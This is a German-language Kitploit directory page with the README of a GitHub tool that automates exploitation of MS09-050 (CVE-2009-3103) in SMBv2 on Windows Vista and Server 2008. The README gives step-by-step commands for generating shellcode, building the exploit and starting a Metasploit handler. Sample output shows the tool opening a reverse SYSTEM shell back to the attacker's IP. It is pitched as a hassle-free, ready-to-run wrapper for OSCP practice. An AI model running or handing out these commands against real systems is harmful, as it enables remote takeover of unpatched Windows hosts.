Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ms09-050-CVE-2009-3103-exploit — Automatisierter Exploit-Wrapper für MS09-050 (CVE-2009-3103), der SMBv2 auf Windows Vista/Server 2008 angreift. Generiert Shellcode, erstellt den Exploit und erzeugt einen Metasploit-Handler für SYSTEM-Shell-Zugriff. | Kitploit
Tools/GitHubGitHub/nicolasdamians/ms09-050-cve-2009-3103-exploit
Payload-GenerierungSchwachstellenanalyseExploitationShellcodePenetrationstestsLernen & Bildung
GitHubnicolasdamians/ms09-050-cve-2009-3103-exploit

ms09-050-CVE-2009-3103-exploit

Automatisierter Exploit-Wrapper für MS09-050 (CVE-2009-3103), der SMBv2 auf Windows Vista/Server 2008 angreift. Generiert Shellcode, erstellt den Exploit und erzeugt einen Metasploit-Handler für SYSTEM-Shell-Zugriff.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
2vor 8 MonatenNoch nicht geprüft
Teilen

MS09-050 SMBv2 Exploit Wrapper

Einzeiler-Setup für die Ausnutzung von MS09-050 (CVE-2009-3103). Kein Ärger, kein Debugging, funktioniert einfach.

Warum?

Die meisten MS09-050-Skripte, die herumschwirren, erfordern manuelle Shellcode-Injektion, haben Timing-Probleme mit Handlern oder funktionieren einfach nicht. Dieser Wrapper:

  • Generiert Shellcode mit korrekten Parametern
  • Erstellt den Exploit automatisch
  • Erstellt einen gebrauchsfertigen Metasploit-Handler
  • Sagt Ihnen genau, was Sie ausführen müssen

Entwickelt für die OSCP-Vorbereitung, bei der Zeit eine Rolle spielt.

Ziel

  • Schwachstelle: MS09-050 / CVE-2009-3103
  • Betroffen: Windows Vista SP1/SP2, Windows Server 2008 (vor R2)
  • Dienst: SMBv2 auf Port 445
  • Ergebnis: SYSTEM Shell

Anforderungen

  • Kali Linux (oder eine beliebige Distribution mit Metasploit)
  • msfvenom
  • msfconsole
  • python2
  • rpcclient (normalerweise vorinstalliert)
  • Verwendung

    root@kitploit:~
    ./ms09_050.sh <TARGET_IP> <YOUR_IP> [PORT]
    

    Beispiel

    root@kitploit:~
    ./ms09_050.sh 192.168.233.40 192.168.45.232 443
    

    Ausgabe:

    root@kitploit:~
    [*] Target: 192.168.233.40 | LHOST: 192.168.45.232 | LPORT: 443
    [*] Generating shellcode...
    [+] Files created:
        - exploit.py
        - handler.rc
    
    === RUN ===
    
    Terminal 1:  msfconsole -q -r handler.rc
    Terminal 2:  python2 exploit.py 192.168.233.40
    

    Ausführung

    1. Terminal 1 - Handler starten:

      root@kitploit:~
      msfconsole -q -r handler.rc
      

      Warten auf: Started reverse TCP handler on ...

    2. Terminal 2 - Exploit ausführen:

      root@kitploit:~
      python2 exploit.py 192.168.233.40
      
    3. Überprüfen Sie Terminal 1 auf Ihre Shell.

    Hinweise

    • Verwendet gestaffeltes Payload (windows/shell/reverse_tcp) - funktioniert zuverlässig mit dem Stager in diesem Exploit
    • Wenn der Exploit fehlschlägt, muss das Ziel möglicherweise neu gestartet werden oder ist nicht anfällig
    • Port 443 empfohlen, wenn 4444 gefiltert ist

    Danksagungen

    Original-Exploit basierend auf ohnozzy's MS09-050 PoC.

    Lizenz

    MIT - Mach was du willst, sei nur nicht böse.

    Tool herunterladen